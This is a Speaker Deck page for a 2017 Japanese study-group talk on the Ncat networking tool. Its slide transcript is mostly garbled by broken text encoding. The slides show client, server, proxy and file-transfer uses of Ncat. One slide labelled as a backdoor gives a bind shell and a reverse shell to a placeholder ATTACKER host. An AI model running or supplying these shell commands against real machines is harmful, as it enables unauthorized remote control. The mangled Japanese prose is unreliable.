Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Ncatをつかおう / Use Ncat

Hayato Imai
June 17, 2017
Programming
1
3.3k

Ncatをつかおう / Use Ncat

長岡 IT開発者 勉強会 第52回勉強会

Hayato Imai

June 17, 2017
Tweet

More Decks by Hayato Imai

See All by Hayato Imai
Kubernetes撤退、 その後のはてなの取り組み / kubernetes meetup tokyo number 52
hayajo
8
6.5k
Mackerelにおける Cloud Nativeへの取り組みと チームへ与えた変化 / CloudNative Days Tokyo 2020
hayajo
2
1.2k
MackerelにおけるKubernetes利用の取組みとこれから / Kubernetes Meetup Tokyo #22
hayajo
20
8.6k
Mackerelチームのコンテナ開発における戦略とこれから / 190722-cndt2019
hayajo
1
1.6k
AWSコンテナサービス入門 / nds60-jaws-ug
hayajo
0
2.6k
コンテナのメトリクスと モニタリングパターン / 190320-sakura-event
hayajo
6
1.4k
Mackerelコンテナエージェントによる コンテナ監視について / Mackerel Meetup #13 Tokyo
hayajo
1
6.7k
Docker for Mac/Windows ではじめる Kubernetes / NDS55 Docker with Kubernetes
hayajo
16
13k
Terrafromで構築するマルチクラウドプラットフォームインフラストラクチャ / NDS53 Terraform
hayajo
0
300

Other Decks in Programming

See All in Programming
サーバーサイド開発にありがたい GitHub Copilot / ChatGPT
masatoshiitoh
1
530
AWS CDKとZodを活用したバリデーションパターン集 / validation patterns with cdk and zod
gotok365
3
1k
Go1.19から始めるGCのチューニング方法
hagatake
0
120
失敗から学ぶBtoB SaaSでカオスを招かない個社カスタマイズ開発の考え方 #開発話
77web
1
360
シン・リッチエディタ徹底解説
microcms
1
600
実践 AWS CDK 〜 いろいろな参照のカタチと使い分け 〜
konokenj
12
2.1k
多様なプロトコルと 駆動モデルをサポートするIoTゲートウェイの開発と運用の知見
takesinoda
0
490
Architecting For Scale
squer
0
220
enjoy_conferences
maimux2x
0
5k
複雑性に立ち向かうためのサーバーサイドコード分割 / JJUG CCC 2023 Spring
hirokunimaeta
1
300
Compose로 Android&Desktop 멀티플랫폼 만들기
pangmoo
0
120
ArkEdge LT #1 dalance
dalance
1
220

Featured

See All Featured
Six Lessons from altMBA
skipperchong
16
2.5k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
500
130k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
270
12k
RailsConf 2023
tenderlove
0
110
Typedesign – Prime Four
hannesfritz
34
1.6k
Web Components: a chance to create the future
zenorocha
304
41k
A Modern Web Designer's Workflow
chriscoyier
689
190k
Building Better People: How to give real-time feedback that sticks.
wjessup
346
18k
Agile that works and the tools we love
rasmusluckow
322
20k
Build your cross-platform service in a week with App Engine
jlugia
222
17k
The Mythical Team-Month
searls
211
41k
The Straight Up "How To Draw Better" Workshop
denniskardys
226
130k

Transcript

  1. /DBUΛ͔͓ͭ͏
    ௕Ԭ*5։ൃऀษڧձୈճษڧձ
    /FUDBU

    View Slide

  2. ࣗݾ঺հ
    w )BZBUP*NBJࠓҪ൏ਓ
    w !IBZBKP
    w Πϯϑϥ୲౰

    View Slide

  3. /FUDBU

    View Slide

  4. /FUDBUͱ͸
    w ODίϚϯυ
    w ωοτϫʔΫͷεΠεΞʔϛʔφΠϑ
    w ଟ໨తωοτϫʔΫϢʔςΟϦςΟ
    w 5$16%1ϓϩτίϧΛѻ͏
    w DBUͷωοτϫʔΫ൛

    View Slide

  5. ͍Ζ͍Ζͳ/FUDBU OD

    ΦϦδφϧ w W
    w 6CVOUV
    (/6൛ w ΦϦδφϧޓ׵ w "SDI FYUSB

    0QFO#4%൛
    w *1Wɺ6%4ରԠ
    w ίϚϯυ࣮ߦඇରԠ
    w $FOU04
    w 049
    /NBQ൛
    ʢ/DBUʣ
    w 44-ରԠɺଟػೳ w $FOU04 OD!ODBU

    CVTZCPY൛ w ΄΅(/6൛ͱಉ͡
    w #VTZ#PY
    w "MQJOF
    ࠓճ͸/NBQ൛/FUDBUͰ͋Δ/DBU ODBU
    Λ঺հ͠·͢ɻ
    IUUQTONBQPSHODBU

    View Slide

  6. /DBU ODBU
    ͷ͔͍͔ͭͨ

    View Slide

  7. ΫϥΠΞϯτ
    $ ncat -C example.com 80
    )551ΫϥΠΞϯτ
    $ ncat -C HOST 11211
    .FNDBDIFΫϥΠΞϯτ "4$**

    $ perl -e 'print "\x80\x00\x00\x05" . "\x00"x4 .
    "\x00\x00\x00\x05" . "\x00"x12 . "\x68\x65\x6c\x6c\x6f"' |\
    > ncat HOST 11211 |\
    > hexdump -C
    .FNDBDIFΫϥΠΞϯτ #*/"3:

    View Slide

  8. αʔό

    SERVER$ ncat -l --broker
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER
    $IBUαʔό CSPLFS

    SERVER$ ncat -l --chat
    HOST1$ ncat SERVER
    HOST2$ ncat SERVER
    $IBUαʔό DIBU

    $IBUαʔό
    SERVER$ ncat -l # σϑΥϧτϙʔτ31337
    HOST1$ ncat SERVER

    View Slide

  9. αʔό

    SERVER$ ncat -l 8080 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl http://SERVER:8080
    8FCαʔό
    SERVER$ ncat --ssl -l 8443 -k \
    > --sh-exec \
    > "echo -e 'HTTP/1.1 200 OK\r\n\r\n';cat index.html"
    CLIENT$ curl -k https://SERVER:8443
    8FCαʔό 44-

    View Slide

  10. ϓϩΩγ

    PROXY$ ncat -l 8080 \
    > --proxy-type http --proxy-auth user:pass
    CLIENT$ curl -v https://example.com \
    > --proxy PROXY:8080 --proxy-user user:pass
    )551ϓϩΩγ
    PROXY$ ncat -l 1883 -k \
    > --sh-exec 'ncat --ssl -i 3 test.mosquitto.org 8883'
    CLIENT$ MQTT_HOST=PROXY MQTT_PORT=1883 mqttcli sub -t "#"
    ϓϩτίϧม׵ )551)5514

    PROXY$ ncat --ssl -l 8443 -k \
    > --sh-exec 'ncat -i 3 -C localhost 3000'
    CLIENT$ curl -k https://PROXY:8443
    44-Φϑϩʔυ

    View Slide

  11. ϓϩΩγ

    PROXY$ mkfifo f
    PROXY$ ncat -l 8080 -k > while true; do \
    > openssl s_client -connect example.com:443 -quiet >f 2>/dev/null; \
    > done
    ίωΫγϣϯϓʔϦϯά
    $ httpstat https://example.com/
    ...
    DNS Lookup TCP Connection TLS Handshake Server Processing Content Transfer
    [ 6ms | 96ms | 371ms | 96ms | 1ms ]
    | | | | |
    namelookup:6ms | | | |
    connect:102ms | | |
    pretransfer:473ms | |
    starttransfer:569ms |
    total:570ms
    $ httpstat http://PROXY:8080 -H 'Host: example.com'
    ...
    DNS Lookup TCP Connection Server Processing Content Transfer
    [ 5ms | 0ms | 98ms | 0ms ]
    | | | |
    namelookup:5ms | | |
    connect:5ms | |
    starttransfer:103ms |
    total:103ms

    View Slide

  12. ϑΝΠϧసૹ
    SERVER$ ncat -l 8080 --recv-only >out.file
    CLIENT$ ncat --send-only SERVER 8080 ΫϥΠΞϯταʔόసૹ
    SERVER$ ncat -l 8080 --send-only CLIENT$ ncat --recv-only SERVER 8080 >out.file
    αʔόΫϥΠΞϯτసૹ
    SERVER$ ncat --ssl -l 8080 --recv-only >out.file
    CLIENT$ ncat --ssl --send-only SERVER 8080 44-సૹ ΫϥΠΞϯταʔόసૹ

    View Slide

  13. TARGET$ ncat -l --exec /bin/sh 8080
    ATTACKER$ ncat TARGET 8080
    λʔήοτʹ௚઀ΞΫηεՄೳͳ৔߹
    ATTACKER$ ncat -l 8080
    TARGET$ ncat --exec /bin/sh ATTACKER 8080
    λʔήοτ͕/"5എޙͷ৔߹
    όοΫυΞ

    View Slide

  14. ΞΫηε੍ޚ
    $ ncat -l 8080 --allow 10.0.0.2
    ڐՄ
    $ ncat -l 8080 --deny 10.0.0.0/8
    ڋ൱
    ྆ํࢦఆͨ͠৔߹͸EFOZ͕༏ઌ͞Ε·͢ɻ

    View Slide

  15. ·ͱΊ

    View Slide

  16. ·ͱΊ
    w /FUDBUίϚϯυ͸͍͔ͭ͘ͷ࣮૷͕͋Δ
    w /DBU͸ଟػೳɺ։ൃ΋੝ΜͳͷͰ͓͢͢Ί
    w ΞΠσΞ࣍ୈͰ༷ʑͳ࢖͍ํ͕͋Δ

    View Slide